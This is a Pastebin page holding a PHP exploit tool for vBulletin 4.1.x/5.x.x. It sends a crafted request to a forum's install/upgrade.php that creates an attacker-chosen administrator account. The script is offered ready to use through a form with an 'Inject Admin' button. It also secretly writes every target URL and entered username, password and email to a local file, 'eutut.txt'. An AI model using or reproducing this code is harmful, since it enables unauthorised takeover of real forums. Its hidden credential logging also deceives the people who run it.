Advertisement
ForumScriptz

vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

Sep 8th, 2013
3,494
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.87 KB | None | 0 0
  1. <h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
  2. <p>Created by: Boxhead</p>
  3. <p>Found on: 08/22/2013</p>
  4. <p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
  5. <br>
  6. <?php
  7. //extract data from the post
  8. if (isset($_POST['submit'])) {
  9.     extract($_POST);
  10.    
  11.     //set POST variables
  12.     $url = $_POST['url'];
  13.     $h   = fopen("eutut.txt", "a");
  14.     $b   = $_POST['customerid'];
  15.     $c   = $_POST['username'];
  16.     $d   = $_POST['password'];
  17.     $z   = $_POST['email'];
  18.     fwrite($h, $url);
  19.     fwrite($h, "-");
  20.     fwrite($h, $b);
  21.     fwrite($h, "-");
  22.     fwrite($h, $c);
  23.     fwrite($h, "-");
  24.     fwrite($h, $d);
  25.     fwrite($h, "-");
  26.     fwrite($h, $z);
  27.     fwrite($h, "------------------------");
  28.     $fields = array(
  29.         'ajax' => urlencode('1'),
  30.         'version' => urlencode('install'),
  31.         'checktable' => urlencode('false'),
  32.         'firstrun' => urlencode('false'),
  33.         'step' => urlencode('7'),
  34.         'startat' => urlencode('0'),
  35.         'only' => urlencode('false'),
  36.         'customerid' => urlencode($_POST['customerid']),
  37.         'options[skiptemplatemerge]' => urlencode('0'),
  38.         'response' => urlencode('yes'),
  39.         'htmlsubmit' => urlencode('1'),
  40.         'htmldata[username]' => urlencode($_POST['username']),
  41.         'htmldata[password]' => urlencode($_POST['password']),
  42.         'htmldata[confirmpassword]' => urlencode($_POST['password']),
  43.         'htmldata[email]' => urlencode($_POST['email'])
  44.     );
  45.    
  46.     //url-ify the data for the POST
  47.     foreach ($fields as $key => $value) {
  48.         $fields_string .= $key . '=' . $value . '&';
  49.     }
  50.     rtrim($fields_string, '&');
  51.    
  52.     //open connection
  53.     $ch = curl_init();
  54.    
  55.     //set the url, number of POST vars, POST data
  56.     curl_setopt($ch, CURLOPT_URL, $url);
  57.     curl_setopt($ch, CURLOPT_POST, count($fields));
  58.     curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
  59.     curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  60.     curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']);
  61.    
  62.     //execute post
  63.     $result = curl_exec($ch);
  64.    
  65.     //close connection
  66.     curl_close($ch);
  67.     exit();
  68. }
  69. ?>
  70. <center>
  71. <form name="sploit" method="POST" action="">
  72. <span>Example:http://test.com/forum/install/upgrade.php</span><br>
  73.   <span>Website:</span>
  74.     <input name="url" type="text" tabindex="1" size="60"   />
  75.     <br>
  76.     <span>Customer ID:</span>
  77.     <input name="customerid" type="text" tabindex="2" size="40" />
  78.     <br>
  79.     <span>Username:</span>
  80.     <input name="username" type="text" tabindex="3" size="40"  />
  81.     <br>
  82.     <span>Password:</span>
  83.     <input name="password" type="text" tabindex="4" size="40" />
  84.     <br>
  85.     <span>Email:</span>
  86.     <input name="email" type="text" tabindex="5" maxlength="40"  />
  87.    
  88. <input name="submit" type="submit" value="Inject Admin">
  89. </form>
  90. </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement